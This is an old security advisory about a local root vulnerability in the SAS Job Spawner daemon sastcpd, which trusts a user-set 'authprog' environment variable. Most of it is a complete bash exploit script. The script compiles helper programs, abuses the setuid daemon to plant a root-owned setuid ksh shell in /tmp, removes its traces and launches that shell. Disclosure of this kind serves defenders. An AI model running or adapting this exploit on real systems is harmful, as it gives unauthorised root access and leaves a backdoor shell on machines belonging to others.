31st Jan 2002 [SBWID-5051]
COMMAND
sastcpd trusts environment variables, which leads to a local root exploit
SYSTEMS AFFECTED
SAS Job Spawner for Open Systems version 8.00
PROBLEM
The daemon passes a user-defined environment variable, 'authprog', to
execve(). This is a problem if sastcpd is setuid: the invoking user
chooses the program that runs with the daemon's privileges.
Exploit
=======
#!/bin/bash
# sastcpd 8.0 'authprog' vulnerability.
# rpc <rpc@unholy.net> || <h@ckz.org>
# Thanks sharefuzz!
cat <<EOT >/tmp/hesh.c
int
main(void)
{
setuid(0);
setgid(0);
execl("/bin/ksh", "ksh", (char *)0);
}
EOT
cat <<EOT >/tmp/heh.c
int
main(void)
{
setuid(0);
setgid(0);
system("chown 0:0 /tmp/hesh");
system("chmod 4755 /tmp/hesh");
return 0;
}
EOT
gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c
export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd
sleep 1
rm /tmp/he*.c
rm /tmp/heh
/tmp/hesh
SOLUTION
None yet